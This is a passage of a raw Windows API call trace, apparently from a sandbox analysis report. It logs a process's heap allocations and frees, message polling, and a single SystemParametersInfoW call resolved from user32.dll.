lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0297.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0297.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0297.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0297.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0297.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0297.083] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0297.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0297.083] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0297.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0297.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0297.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0297.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0297.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0297.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0297.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0297.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0297.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0297.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0297.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0297.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0297.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0297.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0297.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0297.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0297.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0297.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0297.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0297.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0297.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0297.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0297.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0297.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0297.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0297.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0297.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0297.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0297.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0297.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0297.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0297.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0297.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0297.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0297.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0297.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0297.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0297.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0297.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0297.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0297.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0297.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0297.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0297.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0297.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0297.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0297.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0297.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0297.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0297.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0297.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0297.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0297.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0297.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0297.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0297.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0297.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0297.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0297.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0297.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0297.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0297.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0297.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0297.086] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0297.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0297.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0297.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0297.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0297.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0297.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0297.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0297.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0297.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0297.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0297.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0297.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0297.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0297.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0297.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0297.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0297.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0297.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0297.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0297.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0297.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0297.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0297.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0297.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0297.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0297.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0297.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0297.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0297.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0297.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0297.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0297.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0297.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0297.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0297.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0297.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0297.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0297.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0297.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0297.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0297.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0297.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0297.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0297.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0297.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0297.089] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0297.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0297.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0297.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0297.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0297.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0297.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0297.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0297.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0297.090] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0297.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0297.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0297.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0297.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0297.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0297.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0297.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0297.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0297.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0297.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0297.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0297.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0297.090] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0297.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0297.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0297.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0297.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0297.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0297.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0297.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0297.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0297.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0297.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0297.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0297.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0297.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0297.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0297.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0297.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0297.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0297.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0297.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0297.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0297.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0297.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0297.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0297.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0297.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0297.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0297.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0297.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0297.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0297.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0297.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0297.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0297.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0297.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0297.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0297.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0297.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0297.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0297.281] FreeLibrary (hLibModule=0x74f40000) returned 1 [0297.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0297.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0297.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0297.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0297.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0297.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0297.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0297.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0297.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0297.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0297.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0297.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0297.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0297.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0297.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0297.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0297.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0297.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0297.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0297.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0297.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0297.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0297.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0297.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0297.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0297.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0297.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0297.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0297.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0297.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0297.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0297.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0297.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0297.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0297.283] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0297.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0297.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0297.283] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0297.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0297.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0297.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0297.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0297.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0297.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0297.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0297.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0297.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0297.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0297.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0297.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0297.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0297.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0297.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0297.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0297.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 